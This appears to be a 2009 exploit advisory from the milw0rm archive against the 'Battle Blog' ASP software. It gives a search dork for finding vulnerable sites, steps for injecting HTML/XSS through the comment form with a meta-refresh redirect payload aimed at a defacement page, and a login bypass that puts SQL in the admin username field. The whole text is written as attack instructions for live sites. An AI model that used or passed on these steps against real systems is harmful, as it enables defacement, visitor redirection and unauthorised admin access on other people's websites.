35 lines
No EOL
1.2 KiB
Text
35 lines
No EOL
1.2 KiB
Text
###################################################################
|
|
# battle blog sql/html injection vulnerability #
|
|
###################################################################
|
|
|
|
author: $qL_DoCt0r
|
|
email: cookiestealer375@gmail.com
|
|
msn: sidthesloth@windowslive.com
|
|
blog: http://full-discl0sure.blogspot.com
|
|
|
|
html injection vulnerability
|
|
|
|
dork:inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.
|
|
|
|
once on blog...
|
|
scroll down to: make new comment
|
|
|
|
fill in the name: website: e-mail: forms
|
|
then type your html/xss as the comment, eg:<meta HTTP-EQUIV="REFRESH" content="0; url=http://yoursite.com/deface.htm">
|
|
click preview
|
|
then submit
|
|
if your doing a redirect you need to click submit fast
|
|
NOTE: iframes do not work because the submit button doesn't appear
|
|
on some blogs you can use fire bug to make a submit button!
|
|
|
|
|
|
sql injection vulnerability
|
|
|
|
dork: same as before
|
|
|
|
just look on the navigation bar to the side and click admin
|
|
|
|
type your sql as the username
|
|
and leave the password field blank.
|
|
|
|
# milw0rm.com [2009-07-17] |